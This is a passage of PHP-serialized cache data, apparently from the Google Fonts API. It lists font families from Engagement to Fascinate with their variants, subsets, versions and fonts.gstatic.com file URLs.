04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:77:\"http://fonts.gstatic.com/s/engagement/v22/x3dlckLDZbqa7RUs9MFVXNossybsHQI.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:368;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Englebert\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/englebert/v17/xn7iYH8w2XGrC8AR4HSxT_fYdN-WZw.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:369;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Enriqueta\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/enriqueta/v15/goksH6L7AUFrRvV44HVTS0CjkP1Yog.ttf\";s:3:\"500\";s:79:\"http://fonts.gstatic.com/s/enriqueta/v15/gokpH6L7AUFrRvV44HVrv2mHmNZEq6TTFw.ttf\";s:3:\"600\";s:79:\"http://fonts.gstatic.com/s/enriqueta/v15/gokpH6L7AUFrRvV44HVrk26HmNZEq6TTFw.ttf\";s:3:\"700\";s:79:\"http://fonts.gstatic.com/s/enriqueta/v15/gokpH6L7AUFrRvV44HVr92-HmNZEq6TTFw.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:370;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Ephesis\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v7\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:69:\"http://fonts.gstatic.com/s/ephesis/v7/uU9PCBUS8IerL2VG7xPb3vyHmlI.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:371;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Epilogue\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";i:9;s:9:\"100italic\";i:10;s:9:\"200italic\";i:11;s:9:\"300italic\";i:12;s:6:\"italic\";i:13;s:9:\"500italic\";i:14;s:9:\"600italic\";i:15;s:9:\"700italic\";i:16;s:9:\"800italic\";i:17;s:9:\"900italic\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":18:{s:3:\"100\";s:90:\"http://fonts.gstatic.com/s/epilogue/v13/O4ZMFGj5hxF0EhjimngomvnCCtqb30OXMDLiDJXVigHPVA.ttf\";s:3:\"200\";s:90:\"http://fonts.gstatic.com/s/epilogue/v13/O4ZMFGj5hxF0EhjimngomvnCCtqb30OXsDPiDJXVigHPVA.ttf\";s:3:\"300\";s:90:\"http://fonts.gstatic.com/s/epilogue/v13/O4ZMFGj5hxF0EhjimngomvnCCtqb30OXbjPiDJXVigHPVA.ttf\";s:7:\"regular\";s:90:\"http://fonts.gstatic.com/s/epilogue/v13/O4ZMFGj5hxF0EhjimngomvnCCtqb30OXMDPiDJXVigHPVA.ttf\";s:3:\"500\";s:90:\"http://fonts.gstatic.com/s/epilogue/v13/O4ZMFGj5hxF0EhjimngomvnCCtqb30OXAjPiDJXVigHPVA.ttf\";s:3:\"600\";s:90:\"http://fonts.gstatic.com/s/epilogue/v13/O4ZMFGj5hxF0EhjimngomvnCCtqb30OX7jTiDJXVigHPVA.ttf\";s:3:\"700\";s:90:\"http://fonts.gstatic.com/s/epilogue/v13/O4ZMFGj5hxF0EhjimngomvnCCtqb30OX1zTiDJXVigHPVA.ttf\";s:3:\"800\";s:90:\"http://fonts.gstatic.com/s/epilogue/v13/O4ZMFGj5hxF0EhjimngomvnCCtqb30OXsDTiDJXVigHPVA.ttf\";s:3:\"900\";s:90:\"http://fonts.gstatic.com/s/epilogue/v13/O4ZMFGj5hxF0EhjimngomvnCCtqb30OXmTTiDJXVigHPVA.ttf\";s:9:\"100italic\";s:92:\"http://fonts.gstatic.com/s/epilogue/v13/O4ZCFGj5hxF0EhjimlIhqAYaY7EBcUSC-HAKTp_RqATfVHNU.ttf\";s:9:\"200italic\";s:92:\"http://fonts.gstatic.com/s/epilogue/v13/O4ZCFGj5hxF0EhjimlIhqAYaY7EBcUSC-HCKT5_RqATfVHNU.ttf\";s:9:\"300italic\";s:92:\"http://fonts.gstatic.com/s/epilogue/v13/O4ZCFGj5hxF0EhjimlIhqAYaY7EBcUSC-HBUT5_RqATfVHNU.ttf\";s:6:\"italic\";s:92:\"http://fonts.gstatic.com/s/epilogue/v13/O4ZCFGj5hxF0EhjimlIhqAYaY7EBcUSC-HAKT5_RqATfVHNU.ttf\";s:9:\"500italic\";s:92:\"http://fonts.gstatic.com/s/epilogue/v13/O4ZCFGj5hxF0EhjimlIhqAYaY7EBcUSC-HA4T5_RqATfVHNU.ttf\";s:9:\"600italic\";s:92:\"http://fonts.gstatic.com/s/epilogue/v13/O4ZCFGj5hxF0EhjimlIhqAYaY7EBcUSC-HDUSJ_RqATfVHNU.ttf\";s:9:\"700italic\";s:92:\"http://fonts.gstatic.com/s/epilogue/v13/O4ZCFGj5hxF0EhjimlIhqAYaY7EBcUSC-HDtSJ_RqATfVHNU.ttf\";s:9:\"800italic\";s:92:\"http://fonts.gstatic.com/s/epilogue/v13/O4ZCFGj5hxF0EhjimlIhqAYaY7EBcUSC-HCKSJ_RqATfVHNU.ttf\";s:9:\"900italic\";s:92:\"http://fonts.gstatic.com/s/epilogue/v13/O4ZCFGj5hxF0EhjimlIhqAYaY7EBcUSC-HCjSJ_RqATfVHNU.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:372;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Erica One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v23\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/ericaone/v23/WBLnrEXccV9VGrOKmGD1W0_MJMGxiQ.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:373;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Esteban\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/esteban/v14/r05bGLZE-bdGdN-GdOuD5jokU8E.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:374;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Estonia\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v9\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:69:\"http://fonts.gstatic.com/s/estonia/v9/7Au_p_4ijSecA1yHCCL8zkwMIFg.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:375;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Euphoria Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:88:\"http://fonts.gstatic.com/s/euphoriascript/v16/mFTpWb0X2bLb_cx6To2B8GpKoD5ak_ZT1D8x7Q.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:376;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Ewert\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/ewert/v21/va9I4kzO2tFODYBvS-J3kbDP.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:377;O:8:\"stdClass\":8:{s:6:\"family\";s:3:\"Exo\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";i:9;s:9:\"100italic\";i:10;s:9:\"200italic\";i:11;s:9:\"300italic\";i:12;s:6:\"italic\";i:13;s:9:\"500italic\";i:14;s:9:\"600italic\";i:15;s:9:\"700italic\";i:16;s:9:\"800italic\";i:17;s:9:\"900italic\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":18:{s:3:\"100\";s:78:\"http://fonts.gstatic.com/s/exo/v20/4UaZrEtFpBI4f1ZSIK9d4LjJ4lM2CwNsOl4p5Is.ttf\";s:3:\"200\";s:78:\"http://fonts.gstatic.com/s/exo/v20/4UaZrEtFpBI4f1ZSIK9d4LjJ4tM3CwNsOl4p5Is.ttf\";s:3:\"300\";s:78:\"http://fonts.gstatic.com/s/exo/v20/4UaZrEtFpBI4f1ZSIK9d4LjJ4g03CwNsOl4p5Is.ttf\";s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/exo/v20/4UaZrEtFpBI4f1ZSIK9d4LjJ4lM3CwNsOl4p5Is.ttf\";s:3:\"500\";s:78:\"http://fonts.gstatic.com/s/exo/v20/4UaZrEtFpBI4f1ZSIK9d4LjJ4mE3CwNsOl4p5Is.ttf\";s:3:\"600\";s:78:\"http://fonts.gstatic.com/s/exo/v20/4UaZrEtFpBI4f1ZSIK9d4LjJ4o0wCwNsOl4p5Is.ttf\";s:3:\"700\";s:78:\"http://fonts.gstatic.com/s/exo/v20/4UaZrEtFpBI4f1ZSIK9d4LjJ4rQwCwNsOl4p5Is.ttf\";s:3:\"800\";s:78:\"http://fonts.gstatic.com/s/exo/v20/4UaZrEtFpBI4f1ZSIK9d4LjJ4tMwCwNsOl4p5Is.ttf\";s:3:\"900\";s:78:\"http://fonts.gstatic.com/s/exo/v20/4UaZrEtFpBI4f1ZSIK9d4LjJ4vowCwNsOl4p5Is.ttf\";s:9:\"100italic\";s:81:\"http://fonts.gstatic.com/s/exo/v20/4UafrEtFpBISdmSt-MY2ehbO95t040FmPnws9Iu-uA.ttf\";s:9:\"200italic\";s:81:\"http://fonts.gstatic.com/s/exo/v20/4UafrEtFpBISdmSt-MY2ehbO95t0Y0BmPnws9Iu-uA.ttf\";s:9:\"300italic\";s:81:\"http://fonts.gstatic.com/s/exo/v20/4UafrEtFpBISdmSt-MY2ehbO95t0vUBmPnws9Iu-uA.ttf\";s:6:\"italic\";s:81:\"http://fonts.gstatic.com/s/exo/v20/4UafrEtFpBISdmSt-MY2ehbO95t040BmPnws9Iu-uA.ttf\";s:9:\"500italic\";s:81:\"http://fonts.gstatic.com/s/exo/v20/4UafrEtFpBISdmSt-MY2ehbO95t00UBmPnws9Iu-uA.ttf\";s:9:\"600italic\";s:81:\"http://fonts.gstatic.com/s/exo/v20/4UafrEtFpBISdmSt-MY2ehbO95t0PUdmPnws9Iu-uA.ttf\";s:9:\"700italic\";s:81:\"http://fonts.gstatic.com/s/exo/v20/4UafrEtFpBISdmSt-MY2ehbO95t0BEdmPnws9Iu-uA.ttf\";s:9:\"800italic\";s:81:\"http://fonts.gstatic.com/s/exo/v20/4UafrEtFpBISdmSt-MY2ehbO95t0Y0dmPnws9Iu-uA.ttf\";s:9:\"900italic\";s:81:\"http://fonts.gstatic.com/s/exo/v20/4UafrEtFpBISdmSt-MY2ehbO95t0SkdmPnws9Iu-uA.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:378;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Exo 2\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";i:9;s:9:\"100italic\";i:10;s:9:\"200italic\";i:11;s:9:\"300italic\";i:12;s:6:\"italic\";i:13;s:9:\"500italic\";i:14;s:9:\"600italic\";i:15;s:9:\"700italic\";i:16;s:9:\"800italic\";i:17;s:9:\"900italic\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";i:4;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":18:{s:3:\"100\";s:82:\"http://fonts.gstatic.com/s/exo2/v20/7cH1v4okm5zmbvwkAx_sfcEuiD8jvvOcPtq-rpvLpQ.ttf\";s:3:\"200\";s:82:\"http://fonts.gstatic.com/s/exo2/v20/7cH1v4okm5zmbvwkAx_sfcEuiD8jPvKcPtq-rpvLpQ.ttf\";s:3:\"300\";s:82:\"http://fonts.gstatic.com/s/exo2/v20/7cH1v4okm5zmbvwkAx_sfcEuiD8j4PKcPtq-rpvLpQ.ttf\";s:7:\"regular\";s:82:\"http://fonts.gstatic.com/s/exo2/v20/7cH1v4okm5zmbvwkAx_sfcEuiD8jvvKcPtq-rpvLpQ.ttf\";s:3:\"500\";s:82:\"http://fonts.gstatic.com/s/exo2/v20/7cH1v4okm5zmbvwkAx_sfcEuiD8jjPKcPtq-rpvLpQ.ttf\";s:3:\"600\";s:82:\"http://fonts.gstatic.com/s/exo2/v20/7cH1v4okm5zmbvwkAx_sfcEuiD8jYPWcPtq-rpvLpQ.ttf\";s:3:\"700\";s:82:\"http://fonts.gstatic.com/s/exo2/v20/7cH1v4okm5zmbvwkAx_sfcEuiD8jWfWcPtq-rpvLpQ.ttf\";s:3:\"800\";s:82:\"http://fonts.gstatic.com/s/exo2/v20/7cH1v4okm5zmbvwkAx_sfcEuiD8jPvWcPtq-rpvLpQ.ttf\";s:3:\"900\";s:82:\"http://fonts.gstatic.com/s/exo2/v20/7cH1v4okm5zmbvwkAx_sfcEuiD8jF_WcPtq-rpvLpQ.ttf\";s:9:\"100italic\";s:84:\"http://fonts.gstatic.com/s/exo2/v20/7cH3v4okm5zmbtYtMeA0FKq0Jjg2drF0fNC6jJ7bpQBL.ttf\";s:9:\"200italic\";s:84:\"http://fonts.gstatic.com/s/exo2/v20/7cH3v4okm5zmbtYtMeA0FKq0Jjg2drH0fdC6jJ7bpQBL.ttf\";s:9:\"300italic\";s:84:\"http://fonts.gstatic.com/s/exo2/v20/7cH3v4okm5zmbtYtMeA0FKq0Jjg2drEqfdC6jJ7bpQBL.ttf\";s:6:\"italic\";s:84:\"http://fonts.gstatic.com/s/exo2/v20/7cH3v4okm5zmbtYtMeA0FKq0Jjg2drF0fdC6jJ7bpQBL.ttf\";s:9:\"500italic\";s:84:\"http://fonts.gstatic.com/s/exo2/v20/7cH3v4okm5zmbtYtMeA0FKq0Jjg2drFGfdC6jJ7bpQBL.ttf\";s:9:\"600italic\";s:84:\"http://fonts.gstatic.com/s/exo2/v20/7cH3v4okm5zmbtYtMeA0FKq0Jjg2drGqetC6jJ7bpQBL.ttf\";s:9:\"700italic\";s:84:\"http://fonts.gstatic.com/s/exo2/v20/7cH3v4okm5zmbtYtMeA0FKq0Jjg2drGTetC6jJ7bpQBL.ttf\";s:9:\"800italic\";s:84:\"http://fonts.gstatic.com/s/exo2/v20/7cH3v4okm5zmbtYtMeA0FKq0Jjg2drH0etC6jJ7bpQBL.ttf\";s:9:\"900italic\";s:84:\"http://fonts.gstatic.com/s/exo2/v20/7cH3v4okm5zmbtYtMeA0FKq0Jjg2drHdetC6jJ7bpQBL.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:379;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Expletus Sans\";s:8:\"variants\";a:8:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:6:\"italic\";i:5;s:9:\"500italic\";i:6;s:9:\"600italic\";i:7;s:9:\"700italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v24\";s:12:\"lastModified\";s:10:\"2022-08-31\";s:5:\"files\";O:8:\"stdClass\":8:{s:7:\"regular\";s:100:\"http://fonts.gstatic.com/s/expletussans/v24/RLpqK5v5_bqufTYdnhFzDj2dX_IwS3my73zcDaSY2s1oFQTcXfMm.ttf\";s:3:\"500\";s:100:\"http://fonts.gstatic.com/s/expletussans/v24/RLpqK5v5_bqufTYdnhFzDj2dX_IwS3my73zcDaSq2s1oFQTcXfMm.ttf\";s:3:\"600\";s:100:\"http://fonts.gstatic.com/s/expletussans/v24/RLpqK5v5_bqufTYdnhFzDj2dX_IwS3my73zcDaRG3c1oFQTcXfMm.ttf\";s:3:\"700\";s:100:\"http://fonts.gstatic.com/s/expletussans/v24/RLpqK5v5_bqufTYdnhFzDj2dX_IwS3my73zcDaR_3c1oFQTcXfMm.ttf\";s:6:\"italic\";s:103:\"http://fonts.gstatic.com/s/expletussans/v24/RLpoK5v5_bqufTYdnhFzDj2ddfsCtKHbhOZyCrFQmSUrHwD-WOMmKKY.ttf\";s:9:\"500italic\";s:103:\"http://fonts.gstatic.com/s/expletussans/v24/RLpoK5v5_bqufTYdnhFzDj2ddfsCtKHbhOZyCrFQmRcrHwD-WOMmKKY.ttf\";s:9:\"600italic\";s:103:\"http://fonts.gstatic.com/s/expletussans/v24/RLpoK5v5_bqufTYdnhFzDj2ddfsCtKHbhOZyCrFQmfssHwD-WOMmKKY.ttf\";s:9:\"700italic\";s:103:\"http://fonts.gstatic.com/s/expletussans/v24/RLpoK5v5_bqufTYdnhFzDj2ddfsCtKHbhOZyCrFQmcIsHwD-WOMmKKY.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:380;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Explora\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:4:{i:0;s:8:\"cherokee\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v7\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:69:\"http://fonts.gstatic.com/s/explora/v7/tsstApxFfjUH4wrvc1qPonC3vqc.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:381;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Fahkwang\";s:8:\"variants\";a:12:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:7:\"regular\";i:5;s:6:\"italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";}s:7:\"subsets\";a:4:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:4:\"thai\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":12:{s:3:\"200\";s:76:\"http://fonts.gstatic.com/s/fahkwang/v16/Noa26Uj3zpmBOgbNpOJHmZlRFipxkwjx.ttf\";s:9:\"200italic\";s:79:\"http://fonts.gstatic.com/s/fahkwang/v16/Noa06Uj3zpmBOgbNpOqNgHFQHC5Tlhjxdw4.ttf\";s:3:\"300\";s:76:\"http://fonts.gstatic.com/s/fahkwang/v16/Noa26Uj3zpmBOgbNpOIjmplRFipxkwjx.ttf\";s:9:\"300italic\";s:79:\"http://fonts.gstatic.com/s/fahkwang/v16/Noa06Uj3zpmBOgbNpOqNgBVTHC5Tlhjxdw4.ttf\";s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/fahkwang/v16/Noax6Uj3zpmBOgbNpNqPsr1ZPTZ4.ttf\";s:6:\"italic\";s:75:\"http://fonts.gstatic.com/s/fahkwang/v16/Noa36Uj3zpmBOgbNpOqNuLl7OCZ4ihE.ttf\";s:3:\"500\";s:76:\"http://fonts.gstatic.com/s/fahkwang/v16/Noa26Uj3zpmBOgbNpOJ7m5lRFipxkwjx.ttf\";s:9:\"500italic\";s:79:\"http://fonts.gstatic.com/s/fahkwang/v16/Noa06Uj3zpmBOgbNpOqNgE1SHC5Tlhjxdw4.ttf\";s:3:\"600\";s:76:\"http://fonts.gstatic.com/s/fahkwang/v16/Noa26Uj3zpmBOgbNpOJXnJlRFipxkwjx.ttf\";s:9:\"600italic\";s:79:\"http://fonts.gstatic.com/s/fahkwang/v16/Noa06Uj3zpmBOgbNpOqNgGFVHC5Tlhjxdw4.ttf\";s:3:\"700\";s:76:\"http://fonts.gstatic.com/s/fahkwang/v16/Noa26Uj3zpmBOgbNpOIznZlRFipxkwjx.ttf\";s:9:\"700italic\";s:79:\"http://fonts.gstatic.com/s/fahkwang/v16/Noa06Uj3zpmBOgbNpOqNgAVUHC5Tlhjxdw4.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:382;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Familjen Grotesk\";s:8:\"variants\";a:8:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:6:\"italic\";i:5;s:9:\"500italic\";i:6;s:9:\"600italic\";i:7;s:9:\"700italic\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v4\";s:12:\"lastModified\";s:10:\"2022-06-28\";s:5:\"files\";O:8:\"stdClass\":8:{s:7:\"regular\";s:106:\"http://fonts.gstatic.com/s/familjengrotesk/v4/Qw3LZR9ZHiDnImG6-NEMQ41wby8WRnYsfkunR_eGfMGJaSztc1jcEYq2.ttf\";s:3:\"500\";s:106:\"http://fonts.gstatic.com/s/familjengrotesk/v4/Qw3LZR9ZHiDnImG6-NEMQ41wby8WRnYsfkunR_eGfMG7aSztc1jcEYq2.ttf\";s:3:\"600\";s:106:\"http://fonts.gstatic.com/s/familjengrotesk/v4/Qw3LZR9ZHiDnImG6-NEMQ41wby8WRnYsfkunR_eGfMFXbiztc1jcEYq2.ttf\";s:3:\"700\";s:106:\"http://fonts.gstatic.com/s/familjengrotesk/v4/Qw3LZR9ZHiDnImG6-NEMQ41wby8WRnYsfkunR_eGfMFubiztc1jcEYq2.ttf\";s:6:\"italic\";s:109:\"http://fonts.gstatic.com/s/familjengrotesk/v4/Qw31ZR9ZHiDnImG6-NEMQ41wby8WbH8egZPOLG0oe9RBKsSueVz-FJq2Rv4.ttf\";s:9:\"500italic\";s:109:\"http://fonts.gstatic.com/s/familjengrotesk/v4/Qw31ZR9ZHiDnImG6-NEMQ41wby8WbH8egZPOLG0oe9RBKvaueVz-FJq2Rv4.ttf\";s:9:\"600italic\";s:109:\"http://fonts.gstatic.com/s/familjengrotesk/v4/Qw31ZR9ZHiDnImG6-NEMQ41wby8WbH8egZPOLG0oe9RBKhqpeVz-FJq2Rv4.ttf\";s:9:\"700italic\";s:109:\"http://fonts.gstatic.com/s/familjengrotesk/v4/Qw31ZR9ZHiDnImG6-NEMQ41wby8WbH8egZPOLG0oe9RBKiOpeVz-FJq2Rv4.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:383;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Fanwood Text\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/fanwoodtext/v15/3XFtErwl05Ad_vSCF6Fq7xXGRdbY1P1Sbg.ttf\";s:6:\"italic\";s:83:\"http://fonts.gstatic.com/s/fanwoodtext/v15/3XFzErwl05Ad_vSCF6Fq7xX2R9zc9vhCblye.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:384;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Farro\";s:8:\"variants\";a:4:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"700\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":4:{s:3:\"300\";s:69:\"http://fonts.gstatic.com/s/farro/v14/i7dJIFl3byGNHa3hNJ6-WkJUQUq7.ttf\";s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/farro/v14/i7dEIFl3byGNHZVNHLq2cV5d.ttf\";s:3:\"500\";s:69:\"http://fonts.gstatic.com/s/farro/v14/i7dJIFl3byGNHa25NZ6-WkJUQUq7.ttf\";s:3:\"700\";s:69:\"http://fonts.gstatic.com/s/farro/v14/i7dJIFl3byGNHa3xM56-WkJUQUq7.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:385;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Farsan\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:4:{i:0;s:8:\"gujarati\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/farsan/v18/VEMwRoJ0vY_zsyz62q-pxDX9rQ.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:386;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Fascinate\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/fascinate/v21/z7NWdRrufC8XJK0IIEli1LbQRPyNrw.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:387;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Fascinate 